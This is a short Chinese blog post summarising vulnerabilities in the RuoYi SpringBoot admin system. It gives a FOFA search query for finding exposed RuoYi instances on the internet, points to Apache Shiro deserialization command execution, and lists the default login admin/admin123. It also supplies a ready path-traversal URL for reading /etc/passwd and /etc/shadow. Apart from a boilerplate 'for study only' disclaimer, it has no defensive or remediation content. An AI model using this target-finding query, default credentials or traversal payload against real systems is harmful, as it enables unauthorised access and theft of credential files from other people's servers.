若依(RuoYi)管理系统漏洞总结
发布于 2021-04-05 02:16
漏洞背景
若依管理系统是基于SpringBoot的权限管理系统,
1.早期版本有反序列化漏洞 执行任意命令
漏洞复现
祭出fofa大法,fofa语法如下
app="若依-管理系统" && body="admin"
利用工具检测漏洞 这里不提供,太多了,推荐使用zhzy的vulmap
利用poc执行任意命令
2后台登录后可以任意读取文件
登陆后访问 (默认弱口令 admin admin123)
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd
读取 passwd
其他目录读取etc/shadow
第一个准确来说是属于Apache Shiro下的漏洞,第二个才是Ruoyi真正的漏洞,不过遇到RuoYi的都可以先考虑下第一个漏洞试试。
特别声明:
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。
作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 切勿用于非法,仅供学习参考
本文来自网络或网友投稿,如有侵犯您的权益,请发邮件至:aisoutu@outlook.com 我们将第一时间删除。
相关素材